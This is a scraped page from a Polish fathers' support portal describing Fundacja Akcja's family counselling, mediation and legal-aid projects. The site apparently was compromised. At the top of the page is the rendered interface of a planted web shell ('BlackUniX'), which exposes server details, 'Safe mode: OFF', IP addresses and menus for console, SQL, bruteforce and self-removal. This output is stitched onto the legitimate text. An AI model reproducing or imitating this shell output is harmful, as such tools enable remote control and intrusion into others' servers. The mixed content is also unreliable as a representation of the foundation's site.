W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 07:20:31
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Fundacja Akcja
16.09.2010.

Fundacja Akcja została powołana do życia w maju 2002 r. przez grupę osób zajmującą się poradnictwem obywatelskim.
Od momentu powstania Fundacji prowadzimy, działalność na polu profesjonalnego rodzinnego poradnictwa prawnego i psychologicznego. W ciągu 8 lat działalności Fundacji  stworzyliśmy sieć punktów konsultacyjnych w Warszawie, Krakowie,Katowicach, Poznaniu, a także ogólnopolski system poradnictwa mailowego i telefonicznego.

Równolegle, w 2002 r., rozpoczęliśmy tworzenie portalu poradniczego dla mężczyzn zmagających się z kryzysem rodzinnym oraz kryzysem ojcostwa pod nazwą ww.wstroneojca.pl. Portal zdołał ugruntować już swoją pozycję w przestrzeni internetowej, jako wartościowe źródło informacji oraz wsparcia, czego świadectwem jest 4500 stałych, zarejestrowanych użytkowników oraz 2500-3000 gości odwiedzających dziennie strony portalu.

Poszerzając zakres swoich działań Fundacja zajmowała się również poradnictwem dla osób osadzonych w zakładach karnych, aby ułatwić ich adaptację do życia na wolności. Stworzyliśmy w tym celu m.in. poradnik dla osób opuszczających zakłady karne,w którym zawarto informacje, które mogły być pomocne w przystosowaniu się do reguł życia na wolności, a w konsekwencji w uniknięciu powrotu na drogę przestępczą.

W centrum działalności Fundacji znajduje się wspieranie rodziny znajdującej się w kryzysie - jako całości. W związku z tym prowadzimy mediację rodzinna, terapię indywidualną i terapię rodzinną, terapię dla ofiar przemocy oraz poradnictwo prawne.

Planujemy również uruchomienie poradnictwa rodzinnego dla małżeństw mieszanych, to jest małżeństw cudzoziemców z obywatelami polskimi. Fundacja prowadzi także lobbing na rzecz zmian ustawodawczych wyrównujących szanse obojga rodziców na pełnoprawną więź z dzieckiem po rozwodzie. Nasze działania mają na celu dobro obojga rodziców, a przede
wszystkim dziecka w rodzinie, która znalazła się w kryzysie. Realizowaliśmy w związku z tym w 2010 r. kampanię społeczną „Nawet po rozwodzie jesteście mi potrzebni oboje”.

Kampanię objęła patronatem Pani Elżbieta Radziszewska Pełnomocnik Rządu ds. Równego Traktowania, oraz Pani Hanna Gronkiewicz - Walz Prezydent m.st. Warszawy.

Jedną z ostatnich inicjatyw Fundacji jest wdrożenie pilotażowego systemu poradnictwa prawno-rodzinnego dla obcokrajowców w Polsce. W 2009 r. stworzyliśmy tematyczny wielojęzyczny portal www.familylaw.pl. Dzięki niemu obywatele krajów anglojęzycznych, posługujący się językiem hiszpańskim, jako ojczystym, obywatele państw byłego ZSRR posługujący się językiem rosyjskim, a także obywatele krajów arabskim oraz Wietnamu mogą w swoich ojczystych językach zapoznać się z zasadami prawa rodzinnego w Polsce, a także z normami kulturowymi obowiązującymi w polskich rodzinach. Celem projektu jest wsparcie integracji z polskim społeczeństwem obywateli państw spoza Unii Europejskiej.

Od lipca 20010 roku rozpoczęliśmy realizację projektu poradnictwa dla mężczyzn doznających przemocy w rodzinne. Projekt jest finansowany przez urząd m. st. Warszawy.

Nasze inne portale:

www.rodzina.sos.pl

www.familylaw.pl

www.praworodzinne.info

 

 

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.